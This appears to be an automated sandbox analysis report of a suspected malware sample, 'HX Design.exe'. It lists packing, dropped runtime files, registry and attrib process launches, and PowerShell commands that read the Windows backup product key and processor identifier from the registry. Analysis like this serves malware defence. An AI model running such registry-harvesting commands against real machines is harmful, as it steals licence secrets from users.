0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB152000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HX Design.exe, 00000001.00000002.2110372375.00007FFE10301000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HX Design.exe, 00000001.00000002.2112292200.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HX Design.exe, 00000001.00000002.2111882351.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HX Design.exe, 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdb source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000049.00000002.1967359399.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000049.00000000.1955536544.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: HX Design.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HX Design.exe, 00000001.00000002.2111353721.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: HX Design.exe, 00000001.00000002.2109756879.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: HX Design.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: HX Design.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: HX Design.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: HX Design.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: HX Design.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x74DC4D47 [Tue Feb 17 01:39:19 2032 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFAD90350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAD90350
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFACEAC25 push rcx; ret 1_2_00007FFDFACEAC62
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3227AE push rsp; iretd 1_2_00007FFDFB3227B9
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB32267D push rbx; retf 1_2_00007FFDFB322685
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00334331 push rcx; ret 1_2_00007FFE00334332
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A2DD2A5 pushad ; iretd 8_2_00007FFD9A2DD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A3F85FB push ebx; ret 8_2_00007FFD9A3F860A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: "C:\Users\user\Desktop\HX Design.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\libffi-8.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
